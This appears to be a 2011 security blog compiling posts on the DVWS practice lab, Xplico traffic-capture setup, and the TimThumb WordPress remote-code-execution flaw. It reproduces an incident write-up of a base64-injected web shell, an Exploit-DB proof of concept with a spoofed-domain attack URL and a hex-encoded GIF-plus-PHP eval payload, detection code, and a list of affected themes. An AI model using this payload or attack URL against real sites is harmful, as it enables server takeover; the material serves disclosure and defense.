Aug 6, 2011

Damn Vulnerable Web Services (DVWS) was released

Over the years web services have become an integral part of web and mobile applications. From critical business applications like SAP to mobile applications used by millions, web services are becoming more of an attack vector than ever before. Unfortunately, penetration testers haven't kept up with the popularity of web services, recent advancements in web service technology, testing methodologies and tools. In fact, most of the methodologies and tools currently available either don't work properly, are poorly designed or don't fully test for real world web service vulnerabilities. In addition, environments for testing web service tools and attack techniques have been limited to home grown solutions or worse yet, production environments.
In this presentation Tom, Josh and Kevin will discuss the new security issues with web services and release an updated web service testing methodology that will be integrated into the OWASP testing guide, new Metasploit modules and exploits for attacking web services, and an open source vulnerable web service for the Samurai-WTF (Web Testing Framework) that penetration testers can use to test web service attack tools and techniques.


Download Link: http://dvws.secureideas.net/downloads/index.html 


Source: http://dvws.secureideas.net/

If you like my blog, Please Donate Me
One Dollar $1.00

Howto: Use Xplico On Backtrack5

In my last post, "Howto: Install Xplico On Backtrack5", I covered the installation; now I will show you how to use Xplico to extract files and other information from live traffic.

1. Start Xplico
  - /etc/init.d/xplico start

2. Go to http://localhost:9876 and log in with the default username and password => xplico:xplico

3. Click "new case" to create a case and choose "live acquisition" for a live traffic capture case


4. Click the case that was created in step 3

5. Create a new session by clicking "new session" and entering the name you want.

6. Click the session that was created.

7. In the right panel, choose the interface you want to capture on and click the "start" button.

8. Browse the web and watch the results appear in the panel.


Howto: Install Xplico On Backtrack5

Xplico's "Live capture" is not a great solution for capturing network traffic. "Live capture" was introduced only for demonstration purposes and cannot be considered a proper mode for capturing network data.
From version 0.6.2 we have improved the "real time capture" (=> Live capture), but these improvements have not solved (and cannot solve) some limits deliberately imposed on Xplico. Currently, real time capture is performed by a plug-in (module) belonging to the Xplico capture modules and not by a separate application. This capture module uses libpcap to capture data from the network adapter.


1. Install the required packages and xplico (the original command listed "record" and "libmysqliteclient-dev", which are not package names; the Debian packages are "recode" and "libmysqlclient-dev")
   - apt-get install xplico tcpdump apache2 php5 php5-sqlite build-essential perl zlib1g-dev libpcap-dev libsqlite3-dev php5-cli libapache2-mod-php5 libx11-dev libxt-dev libxaw7-dev python3-all sqlite3 recode sox lame libnet1 libnet1-dev libmysqlclient-dev binfmt-support

2. Get GeoLiteCity.dat.gz
   - wget "http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz"

3. Extract GeoLiteCity.dat.gz and move it to /opt/xplico
  - gunzip GeoLiteCity.dat.gz
  - mv GeoLiteCity.dat /opt/xplico

4. Install GeoIP
  - wget "http://geolite.maxmind.com/download/geoip/api/c/GeoIP-1.4.8.tar.gz"
  - tar xzvf GeoIP-1.4.8.tar.gz
  - cd GeoIP-1.4.8
  - ./configure
  - make && make install


5. Install Ghostpdl to view network printer jobs (the original steps skipped extracting the archive before cd)
  - wget "http://mirror.cs.wisc.edu/pub/mirrors/ghost/GPL/ghostpdl/ghostpdl-9.02.tar.gz"
  - tar xzvf ghostpdl-9.02.tar.gz
  - cd ghostpdl-9.02
  - ./configure
  - make && make install


6. Install videosnarf from http://sourceforge.net/projects/ucsniff/files/videosnarf/. On 64-bit download "videosnarf_0.63-1_amd64.deb", otherwise download "videosnarf_0.63-1_i386.deb". The wget below fetches the i386 package, so the dpkg line installs that one; substitute the amd64 file name if that is what you downloaded
  - wget "http://downloads.sourceforge.net/project/ucsniff/videosnarf/videosnarf_0.63-1_i386.deb?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fucsniff%2Ffiles%2Fvideosnarf%2F&ts=1312631762&use_mirror=nchc"
  - dpkg -i videosnarf_0.63-1_i386.deb

7. Append Xplico's apache2 config to the site config in /etc/apache2/sites-available/
  - cat /opt/xplico/cfg/apache_xi >> /etc/apache2/sites-available/default


8. Change the port you want to use for managing Xplico in /etc/apache2/sites-available/xplico and add the lines below to /etc/apache2/ports.conf so Apache binds to it
# xplico Host port
NameVirtualHost *:9876
Listen 9876



9. Modify /etc/php5/apache2/php.ini to allow larger uploads
post_max_size = 100M
upload_max_filesize = 100M

10. Enable the apache2 rewrite module and restart apache2
  - a2enmod rewrite
  - /etc/init.d/apache2 restart 


11. Browse to http://localhost:9876 to use the Xplico web user interface


12. If you get a blank page when visiting localhost:9876, change the permissions on /opt/xplico so apache2 can read and write files under that path.
  - chmod 755 -R /opt/xplico
  or
  - chmod 777 -R /opt/xplico
  (777 makes the whole tree world-writable for every local user; giving the tree to the Apache user instead, e.g. chown -R www-data:www-data /opt/xplico, and keeping 755 is the tighter choice.)


Next time, I will show you how to use Xplico to extract files or pictures from a pcap file.


Aug 4, 2011

Timthumb.php Security Vulnerability [Wordpress Theme]


This news has been everywhere this week, and I have collected a few pages about it in this post for my own reading. If you want the full articles or more detail, please go to the sources.

The News
There has been some buzz about a zero day vulnerability found in Timthumb.php that can allow for arbitrary file uploads. Although this is a platform independent issue, it is especially an issue on WordPress where a lot of theme authors choose to include scripts in themes without any extra security measures.
You can read more details about the TimThumb issue here: markmaunder.com
This is definitely an issue, but it’s just the tip of the iceberg. TimThumb is just one of various scripts that are being added to themes/plugins without further vetting, or even incorrectly. Take Uploadify for example, which we’ve recently seen being exploited in very old versions of a popular WordPress theme.

Another issue is inexperience, well, along with laziness in some cases. WordPress has built in a lot of great capabilities that aren't being properly leveraged. For example, if theme/plugin authors were properly leveraging add_image_size vs. adding TimThumb they would be in a safer position today.
Unfortunately this is not an easy problem to tackle. WordPress core has a great review and vetting process; it is very controlled for good reason. The problem here is really around plugins and themes; it's not as simple as you may think to check every release, given that there are thousands of free and premium options on the market today.

Minimize Your Risk

Here are a few things that if put into practice, will help you minimize the risk of getting exploited:
  1. Keep your themes and plugins updated – the #1 cause of malware infections and hacks independent of any platform!
  2. Only download from reputable sources (WordPress.org).
  3. Only use plugins and themes that are being actively developed and have good, trusted reviews. Do your homework.
  4. Keep an eye on WordPress security news to see if there are any issues with the plugins or themes you are using.
  5. Don't just disable, remove any software that you're not actively using. Just because it's not active doesn't mean it's not vulnerable.

Sucuri WordPress Check

Here is a script we created to enable you to check for some of the issues we’ve outlined above – Sucuri WP Check

How to Use

  1. Save the script to your local machine by right clicking the link above and choosing "save link as"
  2. Log in to your site via sFTP or FTP (we recommend sFTP/SSH)
  3. Upload the script to your root WordPress directory
  4. Rename sucuri_wp_check.txt to sucuri_wp_check.php
  5. Run the script via the browser of your choice – yourdomain.com/sucuri_wp_check.php – make sure you change the URL path to your domain and wherever you uploaded the file
  6. Check the results

Source: http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html

Details and scripts of the WordPress Timthumb.php hack

I also run the latest version of WordPress.org.
My WordPress root directory was writable, but making it read only would not have prevented the hack.
Timthumb.php in its default configuration allows site visitors to load images from a predefined set of remote websites for resizing and serving. Timthumb offers a caching mechanism so that it doesn't have to continually re-process images. The cache directory lives under the wordpress root and is accessible by visitors to the website.
The ability for a site visitor to load content from a remote website and to make the web server write that remote content to a web accessible directory is the cause of the vulnerability in timthumb.php.
To be clear, timthumb.php does not actually execute any remote malicious code that causes this vulnerability. This was a point of confusion among some commenters in my blog post yesterday. It simply gets a remote file and places it in a web accessible directory.
Timthumb only allows remote content from a small range of websites to be loaded remotely. In its default configuration these included Blogger, WordPress.com and other sites that are writeable by the general public.
Timthumb’s verification that remote content was only being loaded by these domains was also broken. You could for example load content from hackersiteblogspot.com or from blogspot.com.hackersite.com.
I’ve submitted a patch that fixes the pattern matching and removed all default public hosting sites from the allowed sites list. The developer has opted to keep a small list in which I’m not in favor of.
In my case the hacker uploaded a script to my cache directory which timthumb.php stores as “external_<md5 hash>.php”. He/she then accessed this script directly in my timthumb cache directory as something like http://markmaunder.com/wp-content/themes/Memoir/scripts/cache/external_md5hash.php
The script uploaded was Alucar shell which is base64 encoded and decodes when it executes. That makes it a little harder to find it using grep or similar tool. You can see the encoded version of Alucar here and the decoded version of Alucar here (without the username and password preamble at the top).
Here’s a screenshot of the UI:
This script which gives a web based shell access was then used to inject base64 code to one of my core wordpress files wp-blog-header.php which lives in the wordpress root directory. The file with injected code looked like this.
The decoded version of this base64 code is this. The code executes whenever a blog page is visited. It fetches a file from a URL and writes it to /tmp. Then it executes the php code that is contained in this file. In my case it simply echo’d some javascript code that would show ads. Here is the code contained in the file in /tmp.
Again, this file is periodically updated with new PHP code, so the attacker could have his way with my server until I found out about it. The code could be altered to instead become a spam system and work its way through a long list of spam emails.
The way I tracked this to conclusion was:
  • Heard audio on my blog telling me I’d won something.
  • Checked Chrome network tools and saw ad content loading and I don’t serve ads.
  • Grepped wordpress source and themes for hostname I saw in ad. Nothing.
  • Dumped mysql databases on server (all of them) and grepped for hostname. Nothing.
  • Confusion reigns.
  • Started working my way through nginx (which is my front end proxy to apache) and apache access and error logs.
  • Spotted lines in apache error log like this: "[Mon Aug 01 11:09:12 2011] [error] [client 127.0.0.1] PHP Warning: file_get_contents(http://blogger.com.zoha.vn/db/load.php): failed to open stream: HTTP request failed! in /usr/local/markmaunder/wp-content/themes/Memoir/timthumb.php on line 675"
  • Checked timthumb’s cache directory and found Alucar.
  • Realized base64 encoding is why I didn’t find anything with grep.
  • Regrepped wordpress source and database and found injection in wp-blog-header.php
  • Decoded base64 stuff and played with Alucar
  • Found tmp file in /tmp
  • Cleaned everything and fixed permissions. Ran chkrootkit and other utils on machine to see if anything else was compromised. Changed passwords, etc.
Source: http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
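The broken domain check described above (a URL only had to contain an allowed name somewhere, so blogspot.com.hackersite.com or hackersiteblogspot.com passed) is the root cause of the whole chain. The following is an added example, not TimThumb's code and not from either blog post: a Python re-creation of that substring-style check next to a stricter one that parses the URL and matches the host on a dot boundary. The allowed-host list is a constructed subset of the defaults the post names.

```python
from urllib.parse import urlsplit

# Constructed subset of the public hosts TimThumb allowed by default. The post
# argues these should be removed entirely, because anyone can publish there;
# a correct host check only helps if the list itself is trustworthy.
ALLOWED_HOSTS = ["blogger.com", "blogspot.com", "wordpress.com"]


def is_allowed_naive(url, allowed=ALLOWED_HOSTS):
    """Substring match over the whole URL, the style of check the post says was
    broken: anything that merely contains an allowed name is accepted."""
    return any(name in url for name in allowed)


def is_allowed_strict(url, allowed=ALLOWED_HOSTS):
    """Parse the URL, then accept the host only if it equals an allowed name or
    is a subdomain of it (".name"), so lookalike and suffix hosts are rejected."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False                      # file://, data:, etc. never qualify
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    for name in allowed:
        name = name.lower()
        if host == name or host.endswith("." + name):
            return True
    return False


def compare(urls):
    """Return {url: (naive_result, strict_result)} so the bypasses stand out."""
    return {u: (is_allowed_naive(u), is_allowed_strict(u)) for u in urls}


if __name__ == "__main__":
    # Constructed sample URLs: one legitimate image, then the shapes named on the page.
    samples = [
        "http://img.blogger.com/photo.jpg",
        "http://blogger.com.evildomain.tld/pocfile.php",
        "http://hackersiteblogspot.com/image.gif",
        "http://evil.tld/load.php?ref=wordpress.com",
    ]
    for url, (naive, strict) in compare(samples).items():
        print(f"naive={naive!s:5} strict={strict!s:5} {url}")
```

Only the first sample passes the strict check; the other three pass the naive one.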

Proof-Of-Concept. [PoC]
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)
  
  
WordPress TimThumb (Theme) Plugin - Remote Code Execution
  
  
Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)
 
  
Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.
 
  
External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/
  
Credits:
- Mark Maunder (Original Researcher)
- MaXe (Independent Proof of Concept Writer)
  
  
-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, because the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type, and appending a PHP file at
the end of this, it is possible to fool TimThumb into believing that it
is a legitimate image, thus caching it locally in the cache directory.
 
 
Attack URL: (Note! Some websites use Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php
 
Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the 'src' GET-request, hashed in MD5 format.
 
 
Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
 
(Transparent GIF + <?php @eval($_GET['cmd']) ?>)
 
  
  
-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.
 
NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
  
  
Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011


Source: http://www.1337day.com/exploits/16592
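The advisory's solution is to update or delete TimThumb and to find renamed copies with find | grep. The block below is an added example, not from the advisory or from Sucuri, that turns the artefacts described on this page into a scanner: TimThumb copies, PHP files inside a cache directory (the external_<md5>.php pattern), files that start with an image header but contain a PHP tag, and eval(base64_decode(...)) injections like the one found in wp-blog-header.php. It builds a constructed sample WordPress tree in a temp directory so it runs offline; the file names and contents in that tree are made up.

```python
import os
import re
import tempfile

# 1x1 transparent GIF, the same image header the proof-of-concept file on the page uses.
GIF_HEADER = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
              b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n")
# eval(base64_decode( ... )) and the common eval(gzinflate(base64_decode( ... ))) variant.
INJECTION_RE = re.compile(rb"eval\s*\(\s*(?:gzinflate\s*\(\s*)?base64_decode\s*\(", re.I)


def classify(path, data):
    """Return the list of signatures that match one file (empty if clean)."""
    findings = []
    name = os.path.basename(path).lower()
    parent = os.path.basename(os.path.dirname(path)).lower()
    if name.endswith(".php") and b"timthumb" in data.lower():
        findings.append("timthumb-script")      # what "find . | grep php | xargs grep timthumb" finds
    if name.endswith(".php") and parent == "cache":
        findings.append("php-in-cache-dir")     # cache/external_<md5>.php should never exist
    if data.startswith(IMAGE_MAGIC) and b"<?php" in data:
        findings.append("image-with-php")       # valid image header with PHP appended
    if INJECTION_RE.search(data):
        findings.append("base64-eval")          # the wp-blog-header.php style injection
    return findings


def scan_tree(root):
    """Walk a WordPress tree; return {relative path: [signatures]} for every hit."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # first MiB is enough for these header/prefix checks
            found = classify(path, data)
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits


def build_sample_site():
    """Constructed sample tree (not a real site): one clean file, one clean image,
    a TimThumb copy, a cached image-plus-PHP file, and an injected core file."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    theme = os.path.join(root, "wp-content", "themes", "Memoir")
    os.makedirs(os.path.join(theme, "scripts", "cache"))
    files = {
        os.path.join(root, "index.php"): b"<?php require('./wp-blog-header.php');",
        os.path.join(theme, "logo.gif"): GIF_HEADER,
        os.path.join(theme, "timthumb.php"): b"<?php\n// TimThumb stand-in for the sample\n",
        os.path.join(theme, "scripts", "cache", "external_0123abcd.php"):
            GIF_HEADER + b"<?php echo 'constructed payload'; ?>",
        os.path.join(root, "wp-blog-header.php"):
            b"<?php eval(base64_decode('aGVsbG8=')); require('wp-load.php');",
    }
    for path, body in files.items():
        with open(path, "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, sigs in sorted(scan_tree(build_sample_site()).items()):
        print(f"{rel}: {', '.join(sigs)}")
```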

List of Themes

The Timthumb 0-day security vulnerability is generating a lot of noise and for good reason. If you have a theme that includes TimThumb, your site can be easily hacked.
Because of this, we checked the WordPress Free Themes Directory and aggregated a list of themes that include TimThumb.
If you use any of the following themes please check to see if the script is present, and make sure it is updated:
8q/scripts/timthumb.php
aerial/lib/timthumb.php
aesthete/timthumb.php
albizia/includes/timthumb.php
amphion-lite/script/timthumb.php
aqua-blue/includes/timthumb.php
aranovo/scripts/timthumb.php
arras/library/timthumb.php
arras-theme/library/timthumb.php
arthemix-bronze/scripts/timthumb.php
arthemix-green/scripts/timthumb.php
artisan/includes/timthumb.php
a-simple-business-theme/scripts/timthumb.php
a-supercms/timthumb.php
aureola/scripts/timthumb.php
aurorae/timthumb.php
autofashion/thumb.php
automotive-blog-theme/Quick Cash Auto/timthumb.php
automotive-blog-theme/timthumb.php
bikes/thumb.php
black_eve/timthumb.php
blex/scripts/timthumb.php
bloggnorge-a1/scripts/timthumb.php
blogified/timthumb.php
blue-corporate-hyve-theme/timthumb.php
bluemag/library/timthumb.php
blue-news/scripts/timthumb.php
bombax/includes/timthumb.php
breakingnewz/timthumb.php
brightsky/scripts/timthumb.php
brochure-melbourne/includes/timthumb.php
business-turnkey/assets/js/timthumb.php
calotropis/includes/timthumb.php
coffee-lite/thumb.php
comet/scripts/timthumb.php
conceditor-wp-strict/scripts/timthumb.php
constructor/layouts/thumb.php
constructor/libs/timthumb.php
constructor/timthumb.php
coverht-wp/scripts/timthumb.php
cover-wp/scripts/timthumb.php
dark-dream-media/timthumb.php
deep-blue/timthumb.php
delicate/thumb.php
diamond-ray/thumb.php
dieselclothings/thumb.php
digitalblue/thumb.php
dimenzion/timthumb.php
epione/script/timthumb.php
evr-green/scripts/timthumb.php
famous/megaframe/megapanel/inc/upload.php
famous/timthumb.php
fashion-style/thumb.php
featuring/timthumb.php
fliphoto/timthumb.php
flix/timthumb.php
fordreporter/scripts/thumb.php
freeside/thumb.php
fresh-blu/scripts/timthumb.php
go-green/modules/timthumb.php
granite-lite/scripts/timthumb.php
greydove/timthumb.php
greyzed/functions/efrog/lib/timthumb.php
gunungkidul/thumb.php
heartspotting-beta/thumb.php
heli-1-wordpress-theme/images/timthumb.php
ideatheme/timthumb.php
impressio/timthumb/timthumb.php
introvert/thumb.php
inuit-types/thumb.php
isotherm-news/thumb.php
iwana-v10/timthumb.php
jambo/thumb.php
jcblackone/thumb.php
kratalistic/thumb.php
life-style-free/thumb.php
likehacker/timthumb.php
litepress/scripts/timthumb.php
loganpress-premium-theme-1/thumb.php
magazine-basic/thumb.php
magup/timthumb.php
make-money-online-theme-1/scripts/timthumb.php
make-money-online-theme-2/scripts/timthumb.php
make-money-online-theme-3/scripts/timthumb.php
make-money-online-theme-4/scripts/timthumb.php
make-money-online-theme/scripts/timthumb.php
meintest/layouts/thumb.php
mobilephonecomparision/thumb.php
moi-magazine/timthumb.php
my-heli/images/timthumb.php
mymag/timthumb.php
mystique/extensions/auto-thumb/timthumb.php
nash/theme-assets/php/timthumb.php
neofresh/timthumb.php
neo_wdl/includes/extensions/thumb.php
new-green-natural-living-ngnl/scripts/timthumb.php
newspress/thumb.php
pearlie/scripts/timthumb.php
pico/scripts/timthumb.php
postage-sydney/includes/timthumb.php
premium-violet/thumb.php
probluezine/timthumb.php
pronto/cjl/pronto/uploadify/check.php
pronto/cjl/pronto/uploadify/uploadify.php
r755/thumb.php
regal/timthumb.php
shaan/timthumb.php
shadow-block/thumb.php
shadow/timthumb.php
simple-but-great/timthumb.php
simplenews_premium/scripts/timthumb.php
simple-red-theme/timthumb.php
simple-tabloid/thumb.php
simplewhite/timthumb.php
slidette/timThumb/timthumb.php
snowblind_colbert/thumb.php
snowblind/thumb.php
spotlight/timthumb.php
squeezepage/timthumb.php
standout/thumb.php
suffusion/timthumb.php
swift/includes/thumb.php
swift/includes/timthumb.php
swift/timthumb.php
techozoic-fluid/options/thumb.php
the_dark_os/tools/timthumb.php
themetiger-fashion/thumb.php
theory/thumb.php
the-theme/core/libs/thumbnails/thumb.php
thrillingtheme/thumb.php
tm-theme/js/timthumb.php
totallyred/scripts/timthumb.php
travelogue-theme/scripts/timthumb.php
true-blue-theme/timthumb.php
ttnews-theme/timthumb.php
twittplus/scripts/timthumb.php
typographywp/timthumb.php
ugly/timthumb.php
unity/timthumb.php
versitility/timthumb.php
vibefolio-teaser-10/scripts/timthumb.php
vina/thumb.php
whitemag/script/thumb.php
wpapi/thumb.php
wpbus-d4/includes/timthumb.php
wp-creativix/scripts/timthumb.php
wp-newsmagazine/scripts/timthumb.php
wp-perfect/js/timthumb.php
wp-premium-orange/timthumb.php
xiando-one/thumb.php
zcool-like/timthumb.php
zcool-like/uploadify.php
Caution: This is not a full list of every theme in the directory that may include TimThumb, just a good start. Even if your theme is not found on this list it is a good idea to do a thorough review for the script, and not a bad thought to contact the theme author.
Note: We only listed the free themes found in the WordPress Free Themes Directory SVN, there are probably many more themes that include TimThumb in the premium theme market. Make sure to check with your vendor to ensure the vulnerability has been fixed if they include the script.
Edit: Thanks to @ottodestruct for clarifying that not all of these themes are approved and/or available to the public via the WordPress Free Themes Directory. Although they are currently found in the theme repository, they are not all publicly available for download.

Source: http://blog.sucuri.net/2011/08/timthumb-security-vulnerability-list-of-themes-including-it.html

